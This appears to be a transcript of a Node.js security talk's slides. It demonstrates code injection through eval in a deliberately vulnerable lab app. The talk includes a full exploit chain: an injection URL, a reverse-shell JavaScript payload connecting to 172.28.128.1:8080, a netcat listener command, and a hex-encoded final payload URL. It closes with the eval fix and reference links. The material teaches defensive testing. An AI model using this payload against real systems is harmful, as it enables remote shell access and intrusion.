node js reverse shell
TRANSCRIPT
NODE JS SECURITYVULNERABILITIES
ABOUT MEMadhu Akula - Automation Security Ninja at Interested in Security & DevOpsNever ending learner!
@madhuakulaAppsecco
WHAT IS NODE JS?
Node.js is an open-source, cross-platformruntime environment for developing server-
side Web applications.
Although Node.js is not a JavaScriptframework, many of its basic modules arewritten in JavaScript, and developers can
write new modules in JavaScript. Theruntime environment interprets JavaScript
using Google's V8 JavaScript engine.
wikipedia
HELLO WORLD HTTP SERVER INNODE JS
var http = require('http');
var server = http.createServer(function(req, res) res.writeHead(200); res.end('Hello World'); ); server.listen(2000);
WHY NODE JS SECURITY?A lot of the application are moving to Javascript, especially
with MEAN (Mongo-Express-Angular-Node) stack.
HOW TO TEST NODE JS SECURITY?It's similar to the normal web application security and adds
additional checks for the Javascript vulnerabilities.
DEMO TIME
REVERSE SHELL ON A NODE.JSAPPLICATION BY @WIREMASK
POC SETUP
VULNERABLE NODE JS CODE'use strict' const http = require('http'); const url = require('url'); const path = require('path');
const animalsJSON = path.join(__dirname, 'animals.json'); const animals = require(animalsJSON);
function requestHandler(req, res)
let urlParams = url.parse(req.url, true);
let queryData = urlParams.query;
res.writeHead(200, "ContentType": "application/json");
ACCESS THE APPLICATIONhttp://localhost:3000/?name=do*
IDENTIFICATIONThe stringToRegexp function is evaluating user input to
create a RegExp object and use it to find elements in anarray.
return eval(prefix + output + suffix); // we control output value
We can insert our own Javascript code in the outputvariable and execute it. The stringToRegexp function
will escape some characters and the output value will beevaluated.
http://localhost:3000/?name=["./;require('util').log('Owned');//*"]
EXPLOIT(function()
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "172.28.128.1", function()
START NETCAT LISTENERnc lvp 8080
SAMPLE URLhttp://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"
HEX PAYLOAD CREATION USING PYTHON>>> payload = 'nodejs reverse shell Java Script code' >>> payload.encode('hex')
FINAL URL WITH PAYLOADhttp://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20766172206e6574203d207265717569726528226e657422292c206370203d207265717569726528226368696c645f70726f6365737322292c207368203d2063702e737061776e28222f62696e2f7368222c205b5d293b2076617220636c69656e74203d206e6577206e65742e536f636b657428293b20636c69656e742e636f6e6e65637428383038302c20223137322e32382e3132382e31222c2066756e6374696f6e28297b20636c69656e742e706970652873682e737464696e293b2073682e7374646f75742e7069706528636c69656e74293b2073682e7374646572722e7069706528636c69656e74293b207d293b2072657475726e202f612f3b207d2928293b', 'hex').toString());//*"
CHECK YOUR NETCAT LISTENER
CONCLUSION
It's highly recommended to avoid using theeval function in a Javascript project. The
fix was rather simple, they started usingusing the RegExp object directly.
WANT TO TRY YOUR YOURSELF?https://github.com/appsecco/vulnerable-apps
docker run p 3000:3000 d appsecco/nodereverseshell
PLAYGROUND FOR NODEJSVULNERABILITIES
DAMN VULNERABLE NODE APPLICATIONAnsible Playbook & Docker
NODE JS SECURITY REFERENCEShttps://www.npmjs.com/package/helmet
https://blog.risingstack.com/node-js-security-checklist/https://nodesecurity.io/resources
https://groups.google.com/forum/#!forum/nodejs-sec
